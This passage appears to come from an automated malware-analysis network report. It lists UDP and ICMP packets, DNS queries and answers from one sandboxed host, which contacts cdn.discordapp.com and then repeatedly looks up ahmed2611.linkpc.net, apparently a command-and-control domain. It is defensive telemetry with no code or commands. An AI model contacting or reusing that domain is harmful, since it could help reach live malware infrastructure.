Aug 3, 2021 22:58:07.073790073 CEST	53	64124	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:12.082293987 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:13.077771902 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:13.111668110 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:17.107544899 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:18.129344940 CEST	63150	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:18.162389994 CEST	53	63150	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:23.214375019 CEST	53279	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:23.251552105 CEST	53	53279	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:28.277477026 CEST	56881	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:28.310343981 CEST	53	56881	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:33.320286989 CEST	53642	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:33.354041100 CEST	53	53642	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:38.412961006 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:39.407859087 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:39.443133116 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:43.441981077 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:44.465177059 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:45.486190081 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:45.521492004 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:49.494283915 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:50.551140070 CEST	62476	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:50.584944010 CEST	53	62476	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:50.698828936 CEST	49705	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:50.737536907 CEST	53	49705	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:51.244564056 CEST	61477	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:51.277365923 CEST	53	61477	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:51.928400993 CEST	61633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:51.952996969 CEST	53	61633	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:52.305299997 CEST	55949	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:52.339720964 CEST	53	55949	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:52.857496977 CEST	57601	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:52.893757105 CEST	53	57601	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:53.269078016 CEST	49342	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:53.301929951 CEST	53	49342	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:53.920207024 CEST	56253	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:53.972387075 CEST	53	56253	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:54.785727978 CEST	49667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:54.818511963 CEST	53	49667	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:55.605871916 CEST	55439	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:55.632359028 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:55.639400005 CEST	53	55439	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:55.992594957 CEST	57659	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:56.017342091 CEST	53	57659	8.8.8.8	192.168.2.3
Aug 3, 2021 22:58:56.638130903 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:57.653956890 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:58:57.687501907 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:00.658595085 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:01.663805008 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:02.705645084 CEST	54717	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:02.739706039 CEST	53	54717	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:07.758469105 CEST	63975	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:08.780117989 CEST	63975	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:08.812978983 CEST	53	63975	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:12.783869028 CEST	53	63975	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:13.881905079 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:14.891408920 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:15.891653061 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:15.925398111 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:18.908701897 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:19.916956902 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:20.941657066 CEST	51856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:21.937215090 CEST	51856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:21.970822096 CEST	53	51856	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:25.970768929 CEST	53	51856	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:26.991318941 CEST	56546	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:27.985306025 CEST	56546	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:28.020617962 CEST	53	56546	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:32.019942045 CEST	53	56546	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:33.072041988 CEST	62152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:33.104481936 CEST	53	62152	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:38.117816925 CEST	53470	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:38.153395891 CEST	53	53470	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:43.169581890 CEST	56446	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:43.203515053 CEST	53	56446	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:48.286782980 CEST	59631	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:48.319499016 CEST	53	59631	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:53.341427088 CEST	55515	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:53.374861956 CEST	53	55515	8.8.8.8	192.168.2.3
Aug 3, 2021 22:59:58.388113022 CEST	64547	53	192.168.2.3	8.8.8.8
Aug 3, 2021 22:59:58.425638914 CEST	53	64547	8.8.8.8	192.168.2.3
Aug 3, 2021 23:00:03.473300934 CEST	51759	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:00:03.505693913 CEST	53	51759	8.8.8.8	192.168.2.3
Aug 3, 2021 23:00:08.532011986 CEST	59207	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:00:08.567926884 CEST	53	59207	8.8.8.8	192.168.2.3
Aug 3, 2021 23:00:13.586216927 CEST	54269	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:00:14.598020077 CEST	54269	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:00:14.630897999 CEST	53	54269	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 3, 2021 22:56:45.626965046 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:56:46.647191048 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:07.907447100 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:08.955553055 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:15.028670073 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:26.165271997 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:37.313672066 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:43.368618965 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:57:54.525384903 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:58:05.878096104 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:58:17.107681990 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:58:43.442053080 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:58:49.494410992 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:00.659595966 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:01.664061069 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:12.784274101 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:18.909312963 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:19.917088985 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:25.971071005 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable
Aug 3, 2021 22:59:32.020162106 CEST	192.168.2.3	8.8.8.8	cff7	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 22:56:08.237150908 CEST	192.168.2.3	8.8.8.8	0x95f	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.047015905 CEST	192.168.2.3	8.8.8.8	0xa3ae	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:40.600747108 CEST	192.168.2.3	8.8.8.8	0x2a0f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:41.616393089 CEST	192.168.2.3	8.8.8.8	0x2a0f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:42.616389990 CEST	192.168.2.3	8.8.8.8	0x2a0f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:47.669047117 CEST	192.168.2.3	8.8.8.8	0xa56b	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:52.716566086 CEST	192.168.2.3	8.8.8.8	0x8df6	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:57.821424961 CEST	192.168.2.3	8.8.8.8	0xa0eb	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:02.882054090 CEST	192.168.2.3	8.8.8.8	0xb4e3	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:03.930553913 CEST	192.168.2.3	8.8.8.8	0xb4e3	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:04.931020021 CEST	192.168.2.3	8.8.8.8	0xb4e3	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:10.002260923 CEST	192.168.2.3	8.8.8.8	0xea5a	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:10.994247913 CEST	192.168.2.3	8.8.8.8	0xea5a	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:16.082447052 CEST	192.168.2.3	8.8.8.8	0x1b82	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:21.136218071 CEST	192.168.2.3	8.8.8.8	0x393	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:22.135423899 CEST	192.168.2.3	8.8.8.8	0x393	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:27.188684940 CEST	192.168.2.3	8.8.8.8	0x926a	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:32.286360025 CEST	192.168.2.3	8.8.8.8	0xb6d6	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:33.277657986 CEST	192.168.2.3	8.8.8.8	0xb6d6	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:38.342689037 CEST	192.168.2.3	8.8.8.8	0xa3d5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:39.340320110 CEST	192.168.2.3	8.8.8.8	0xa3d5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:44.394041061 CEST	192.168.2.3	8.8.8.8	0x65c9	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:49.499377966 CEST	192.168.2.3	8.8.8.8	0x8b50	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:50.497266054 CEST	192.168.2.3	8.8.8.8	0x8b50	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:55.558190107 CEST	192.168.2.3	8.8.8.8	0xdb77	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:00.852359056 CEST	192.168.2.3	8.8.8.8	0xc819	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:01.950614929 CEST	192.168.2.3	8.8.8.8	0xc819	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:07.038074017 CEST	192.168.2.3	8.8.8.8	0x6c01	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:12.082293987 CEST	192.168.2.3	8.8.8.8	0x52d0	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:13.077771902 CEST	192.168.2.3	8.8.8.8	0x52d0	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:18.129344940 CEST	192.168.2.3	8.8.8.8	0xe5ef	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:23.214375019 CEST	192.168.2.3	8.8.8.8	0x236d	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:28.277477026 CEST	192.168.2.3	8.8.8.8	0x7984	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:33.320286989 CEST	192.168.2.3	8.8.8.8	0x724f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:38.412961006 CEST	192.168.2.3	8.8.8.8	0x3876	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:39.407859087 CEST	192.168.2.3	8.8.8.8	0x3876	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:44.465177059 CEST	192.168.2.3	8.8.8.8	0x2f74	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:45.486190081 CEST	192.168.2.3	8.8.8.8	0x2f74	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:50.551140070 CEST	192.168.2.3	8.8.8.8	0xa16d	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:55.632359028 CEST	192.168.2.3	8.8.8.8	0xe421	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:56.638130903 CEST	192.168.2.3	8.8.8.8	0xe421	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:57.653956890 CEST	192.168.2.3	8.8.8.8	0xe421	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:02.705645084 CEST	192.168.2.3	8.8.8.8	0x399f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:07.758469105 CEST	192.168.2.3	8.8.8.8	0x582f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:08.780117989 CEST	192.168.2.3	8.8.8.8	0x582f	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:13.881905079 CEST	192.168.2.3	8.8.8.8	0xb0e5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:14.891408920 CEST	192.168.2.3	8.8.8.8	0xb0e5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:15.891653061 CEST	192.168.2.3	8.8.8.8	0xb0e5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:20.941657066 CEST	192.168.2.3	8.8.8.8	0x2d20	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:21.937215090 CEST	192.168.2.3	8.8.8.8	0x2d20	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:26.991318941 CEST	192.168.2.3	8.8.8.8	0x7bdb	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:27.985306025 CEST	192.168.2.3	8.8.8.8	0x7bdb	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:33.072041988 CEST	192.168.2.3	8.8.8.8	0x5881	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:38.117816925 CEST	192.168.2.3	8.8.8.8	0x1ed8	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:43.169581890 CEST	192.168.2.3	8.8.8.8	0x4fde	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:48.286782980 CEST	192.168.2.3	8.8.8.8	0x2ead	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:53.341427088 CEST	192.168.2.3	8.8.8.8	0x77a5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:58.388113022 CEST	192.168.2.3	8.8.8.8	0x9034	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:03.473300934 CEST	192.168.2.3	8.8.8.8	0x8b7	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:08.532011986 CEST	192.168.2.3	8.8.8.8	0xd516	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:13.586216927 CEST	192.168.2.3	8.8.8.8	0xd0c5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:14.598020077 CEST	192.168.2.3	8.8.8.8	0xd0c5	Standard query (0)	ahmed2611.linkpc.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 22:56:08.278302908 CEST	8.8.8.8	192.168.2.3	0x95f	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:08.278302908 CEST	8.8.8.8	192.168.2.3	0x95f	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:08.278302908 CEST	8.8.8.8	192.168.2.3	0x95f	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:08.278302908 CEST	8.8.8.8	192.168.2.3	0x95f	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:08.278302908 CEST	8.8.8.8	192.168.2.3	0x95f	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.079322100 CEST	8.8.8.8	192.168.2.3	0xa3ae	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.079322100 CEST	8.8.8.8	192.168.2.3	0xa3ae	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.079322100 CEST	8.8.8.8	192.168.2.3	0xa3ae	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.079322100 CEST	8.8.8.8	192.168.2.3	0xa3ae	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:30.079322100 CEST	8.8.8.8	192.168.2.3	0xa3ae	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:42.652539015 CEST	8.8.8.8	192.168.2.3	0x2a0f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:45.626810074 CEST	8.8.8.8	192.168.2.3	0x2a0f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:46.643323898 CEST	8.8.8.8	192.168.2.3	0x2a0f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:47.702802896 CEST	8.8.8.8	192.168.2.3	0xa56b	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:52.750658989 CEST	8.8.8.8	192.168.2.3	0x8df6	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:56:57.854010105 CEST	8.8.8.8	192.168.2.3	0xa0eb	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:04.963404894 CEST	8.8.8.8	192.168.2.3	0xb4e3	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:07.906985998 CEST	8.8.8.8	192.168.2.3	0xb4e3	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:08.955355883 CEST	8.8.8.8	192.168.2.3	0xb4e3	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:11.027322054 CEST	8.8.8.8	192.168.2.3	0xea5a	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:15.028481007 CEST	8.8.8.8	192.168.2.3	0xea5a	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:16.115375996 CEST	8.8.8.8	192.168.2.3	0x1b82	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:22.170866966 CEST	8.8.8.8	192.168.2.3	0x393	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:26.165043116 CEST	8.8.8.8	192.168.2.3	0x393	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:27.221488953 CEST	8.8.8.8	192.168.2.3	0x926a	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:33.310177088 CEST	8.8.8.8	192.168.2.3	0xb6d6	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:37.313582897 CEST	8.8.8.8	192.168.2.3	0xb6d6	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:39.373404026 CEST	8.8.8.8	192.168.2.3	0xa3d5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:43.368331909 CEST	8.8.8.8	192.168.2.3	0xa3d5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:44.429614067 CEST	8.8.8.8	192.168.2.3	0x65c9	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:50.529581070 CEST	8.8.8.8	192.168.2.3	0x8b50	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:54.525105000 CEST	8.8.8.8	192.168.2.3	0x8b50	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:57:55.593192101 CEST	8.8.8.8	192.168.2.3	0xdb77	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:01.984244108 CEST	8.8.8.8	192.168.2.3	0xc819	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:05.877895117 CEST	8.8.8.8	192.168.2.3	0xc819	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:07.073790073 CEST	8.8.8.8	192.168.2.3	0x6c01	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:13.111668110 CEST	8.8.8.8	192.168.2.3	0x52d0	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:17.107544899 CEST	8.8.8.8	192.168.2.3	0x52d0	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:18.162389994 CEST	8.8.8.8	192.168.2.3	0xe5ef	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:23.251552105 CEST	8.8.8.8	192.168.2.3	0x236d	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:28.310343981 CEST	8.8.8.8	192.168.2.3	0x7984	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:33.354041100 CEST	8.8.8.8	192.168.2.3	0x724f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:39.443133116 CEST	8.8.8.8	192.168.2.3	0x3876	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:43.441981077 CEST	8.8.8.8	192.168.2.3	0x3876	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:45.521492004 CEST	8.8.8.8	192.168.2.3	0x2f74	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:49.494283915 CEST	8.8.8.8	192.168.2.3	0x2f74	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:50.584944010 CEST	8.8.8.8	192.168.2.3	0xa16d	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:58:57.687501907 CEST	8.8.8.8	192.168.2.3	0xe421	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:00.658595085 CEST	8.8.8.8	192.168.2.3	0xe421	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:01.663805008 CEST	8.8.8.8	192.168.2.3	0xe421	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
